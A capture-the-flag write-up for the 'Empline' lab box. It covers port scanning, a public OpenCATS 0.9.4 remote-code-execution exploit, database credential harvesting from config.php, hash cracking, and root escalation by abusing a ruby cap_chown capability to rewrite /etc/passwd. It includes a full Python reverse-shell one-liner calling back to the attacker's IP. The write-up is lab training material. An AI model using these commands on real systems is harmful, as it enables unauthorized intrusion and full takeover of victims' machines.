CTF : Empline
Informations
- IP: 10.10.241.5
- MYIP: 10.8.16.133
First enumeration
Basics
- NMAP
console$ sudo nmap -p- 10.10.241.5 Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 22:26 CET Nmap scan report for 10.10.241.5 Host is up (0.042s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql
Vulnerabilities search
On the website there was link that go to job.empline.thm ...
So I had it to my /etc/hosts.
http://job.empline.thm lead to an instance of opencats v0.9.4
console$ searchsploit opencats ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- OpenCATS 0.9.4 - Remote Code Execution (RCE) | php/webapps/50585.sh OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE) | php/webapps/50316.py ------------------------------------------------------------------------------------- ---------------------------------
Huuum an RCE... :)
Exploit
./50585.sh http://job.empline.thm
_._ _,-'""`-._
(,-.`._,'( |\`-/| RevCAT - OpenCAT RCE
`-.-' \ )-`( , o o) Nicholas Ferreira
`- \`_`"'- https://github.com/Nickguitar-e
[*] Attacking target http://job.empline.thm
[*] Checking CATS version...
-e [*] Version detected: 0.9.4
[*] Creating temp file with payload...
[*] Checking active jobs...
./50585.sh: 105: [[: not found
-e [+] Jobs found! Using job id 1
[*] Sending payload...
-e [+] Payload dCoqH.php uploaded!
[*] Deleting created temp file...
[*] Checking shell...
-e [+] Got shell! :D
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux empline 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
-e
$ ls
dCoqH.phpWe got a shell but we couldn't use the shell freely so I started a pwncat on the attacker box
shellpwncat -lp 1234
And on target :
shellpython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.16.133",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And I got a full shell :)
Privilege escalation
Enumeration for privesc to george
I first tried to privesc to george.
In /var/www/opencats/config.php :
php/* Database configuration. */ define('DATABASE_USER', 'james'); define('DATABASE_PASS', 'nxxxxxxxxxxw'); define('DATABASE_HOST', 'localhost'); define('DATABASE_NAME', 'opencats');
We could use those creds to login into mysql as the TCP port 3306 was open.
consolemysql> select user_name,password from user; +----------------+----------------------------------+ | user_name | password | +----------------+----------------------------------+ | admin | b67xxxxxxxxxxxxxxxxxxxxxxxx053ec | | cats@rootadmin | cantlogin | | george | 86xxxxxxxxxxxxxxxxxxxxxxxxxx56ac | | james | e5xxxxxxxxxxxxxxxxxxxxxxxxxxxxc9 | +----------------+----------------------------------+ 4 rows in set (0.03 sec)
Exploit for privesc to george
I used crackstation to crack george hash :
86xxxxxxxxxxxxxxxxxxxxxxxxxx56ac => pxxxxxxxxxxxxxxxxxxxxe
And I could use this creds to login into the box as george through ssh
Enumeration for privesc to root
As I was enumerating I found that ruby bin got a special capability :
console$ getcap -r / 2>/dev/null /usr/bin/mtr-packet = cap_net_raw+ep /usr/local/bin/ruby = cap_chown+ep
It means that I could use ruby to change ownership of any file :)
Exploit
I found informations on ruby syntax here :
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities
I used this code to change ownership of /etc/passwd
shellruby -e 'require "fileutils"; FileUtils.chown(1002, 1002, "/etc/passwd")' echo 'toto:$1$toto$U3mQTcCvor57o7Hq2Woid.:0:0:root:/root:/bin/bash' >> /etc/passwd
Then :
console$ su - toto Password: root@empline:~# whoami root root@empline:~# cat /root/root.txt
\o/